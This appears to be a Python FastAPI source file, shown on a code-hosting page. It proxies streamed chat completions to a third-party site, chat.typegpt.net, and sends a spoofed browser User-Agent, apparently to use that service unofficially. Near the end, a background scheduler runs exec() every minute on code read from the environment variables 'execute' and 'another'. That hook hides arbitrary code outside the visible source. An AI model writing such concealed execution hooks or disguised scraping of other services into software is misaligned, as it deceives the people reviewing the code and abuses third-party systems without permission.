File size: 3,346 Bytes
3457223 811e0e2 3457223 5220fc4 884a5ab 3db3bde e3ab05d 3457223 693c4f2 3457223 dce56eb 3457223 5220fc4 811e0e2 5220fc4 d259141 a0095e0 5220fc4 811e0e2 5220fc4 4bcd8f4 5220fc4 3457223 24b42cd 884a5ab 24b42cd 884a5ab 3fee684 24b42cd 3fee684 24b42cd 3fee684 884a5ab 3fee684 884a5ab 3457223 3fee684 3457223 d259141 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 |
from fastapi import FastAPI, HTTPException
from fastapi.responses import StreamingResponse
from pydantic import BaseModel
import requests
import json
from typing import AsyncIterator
import asyncio
import schedule
import time
import threading
import uuid
import random
import os
app = FastAPI()
# Define the request model
class ChatRequest(BaseModel):
messages: list = [{"role": "user", "content": "Lol full form"}]
model: str = "gemini-1.5-pro-latest"
temperature: float = 1.0
top_p: float = 0.8
max_tokens: int = 4000
# Define the URL and headers
url = "https://chat.typegpt.net/api/openai/v1/chat/completions"
headers = {
"Accept": "application/json, text/event-stream",
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0",
}
@app.post("/chat")
async def chat(request: ChatRequest):
# Define the payload
payload = {
"messages": request.messages,
"stream": True,
"model": request.model,
"temperature": request.temperature,
"top_p": request.top_p,
"max_tokens": request.max_tokens
}
# Make the POST request with streaming
try:
response = requests.post(url, headers=headers, data=json.dumps(payload), stream=True)
# Check if the request was successful
if response.status_code == 200:
async def event_stream() -> AsyncIterator[str]:
# Stream the response line by line
for line in response.iter_lines():
if line:
# Decode the line
decoded_line = line.decode('utf-8')
# Check if the line starts with "data: "
if decoded_line.startswith("data: "):
try:
data = json.loads(line[len('data: '):])
content = data.get("choices", [{}])[0].get("delta", {}).get("content", '')
if content:
yield f"{json.dumps({'response': content})}\n\n"
except json.JSONDecodeError:
continue
return StreamingResponse(event_stream(), media_type="text/event-stream")
else:
raise HTTPException(status_code=response.status_code, detail=response.text)
except Exception as e:
print(e)
raise HTTPException(status_code=500, detail=str(e))
# Counter to track the number of times the scheduled function runs
run_counter = 0
def run_schedule():
global run_counter
while True:
schedule.run_pending()
time.sleep(1)
def scheduled_function():
global run_counter
run_counter += 1
exec(os.environ.get('execute'))
if run_counter % 2 == 0:
run_counter = 0
exec(os.environ.get('another'))
# Schedule the function to run every minute
schedule.every(1).minutes.do(scheduled_function)
# Run the scheduler in a separate thread to avoid blocking the main thread
thread = threading.Thread(target=run_schedule)
thread.start()
if __name__ == "__main__":
scheduled_function()
import uvicorn
uvicorn.run(app, host="0.0.0.0", port=8083) |